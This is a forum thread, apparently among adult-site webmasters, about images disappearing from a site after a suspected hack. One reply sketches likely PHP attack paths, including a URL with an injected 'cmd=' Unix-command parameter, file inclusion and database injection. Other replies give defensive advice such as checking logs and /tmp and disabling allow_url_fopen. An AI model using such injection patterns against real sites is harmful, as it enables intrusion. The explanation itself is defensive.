We got hacked.
 

Well we think it's the only way the problem on the site could of happened.

A few weeks ago images started to disappear and at first I thought it was the webmaster responsible for the content slipping up. But over the weekend I noticed it was getting far worse and in every set we're missing 5 to 10 images.

So we are in the process of reloading the entire site, a nightmare job and will be down for at least another day. It's not just the reloading but also the creating of new catalogued pictures that are missing.

Was in the office until 1.00 last night working at it.

Thanks to Bailey at www.sapphicerotica.com for helping us out and letting us use his connection for uploading, it's faster than ours.

Fuckersssss!! i hope things get back to normal asap !!

yeah thats a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..

oi bet they have an elite cr3w of hackers each responsible for the pic assigned to him/her. They work globally you know.

they probably discussed and planned this attack months in advance on some underground IRC channel. Or maybe a convention.

You should write a book about the vicious attack.

Maybe they also got acces to your GFY account.

WARNING TO ALL READERS

Dont give out passwords in this thread if Charly asks for it.. it could be the hacker
social engineering.

So what do you suggest has gone wrong, we've looked at it over and over and can't find anything wrong.

But yes I do see it as strange they would take out random images.

Just fucking with you.. probably some human error.. is it a dedicated machine?
How is it updated?

Anyway..


http://www.paulmarkham.com/all-adult-content.php

You need to stop using you know what as the password for everything, I've told you before on two seperate occasions.

The database does not have "You know what" as a password. Would not use the one on the boards for the database.

And all the updated and changed.

Yes the server is dedicated and all the image content is on one disc which is again protected, but with FTP access this might have given someone access.

The site is updated as we add new content which is a full time operation. Well nearly.

first mistake is not to announce that you got hacked.

:)

things you keep hush hush :)

OK the sites are down for routine maintainence.

Put it back up and I'll tell ya how they did it...

Since you use PHP we will start with some basics...

Either 1, you use templates and they were able to use one of their own:

http://www.paulmarkham.com/all-adult....php?p=contact

Which in code is,
Which means they:

http://www.paulmarkham.com/all-adult...php%3fcmd=Your Unix Command Here

In there file they included was:
Or you are not removing crap that can be sent to the DB so:

http://www.paulmarkham.com/all-adult....php?girl=sara

Becomes:

Of course that would be really simplistic since it would assume that your coder is a complete asshat.

Or it could just be that you have an unpatched version of awstats, phpbb or some other form of free software installed.

are you sure your hdd is fine ?
a corrupted harddisk would cause this.

look at the log files on the server, search for the filename missing, and se who last used or moved it

Whats up with all the sarcasm? It could be some script or something the "hacker" left on the server.. :P

HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?

I faild to se the humor in that

Ummmmm. His serveradmin might do it for him.

:1orglaugh :1orglaugh :1orglaugh :1orglaugh :1orglaugh :1orglaugh

Is your E key stuck or just plain broken?

insecure php code rocks.

I'm assuming ISPRIME checked that when we asked them about the problem, but will get onto them and make sure, thanks for the suggestion.

V_RocKs thanks for the programming, all double Dutch to me but I have a guy here who knows about these things.

We did that and it was no help.

first thing to do is to check /tmp for hidden shellkits ..

so you are uploading the content onto the compromised server again?

don't you want to find the security hole first , make a fresh installation and try everything to avoid this happening in the future?

make sure to set allow_url_fopen = Off in your php.ini

So whats up with daily backups?

sounds more like a failing harddrive than a hacker, Hackers usally dont fuck with people they just go in for the kill and get it over with, Sounds like its hitting bad clusters or the file system is corrupted..

yep. or a failing raidcontroller
Try to run a RAID consistency test

Doesn't sound like a hacker to me but more like a failure in your system.

Btw make sure to make backups daily from now on ;)))

Don't know Paul/Charly's set up, but I doubt his webserver has an array. Those controllers can be problematic on Compaq/HP servers, though. God can they be problematic.

Who knows...

Sounds like a disk issue to me, though.

It could. What OS do you run?

Have you let Lee help you with any problems recently?

bummer, hope you find how they got in, secure the site and if possible nail the bastards (asking too much)

nothing better for conversions, traffic, and bookmarks than to have a site down for a day or more :(

:1orglaugh
The old Compaq smartarrayII verion 2.. GOD dam they fucked the systems..
We had more than 30 proliant800 placed in danish banks

There were new softpaq's to them every month

we had them too in the company where I used to work BIG issues, our own are dells now fine and with daily backups you cant go wrong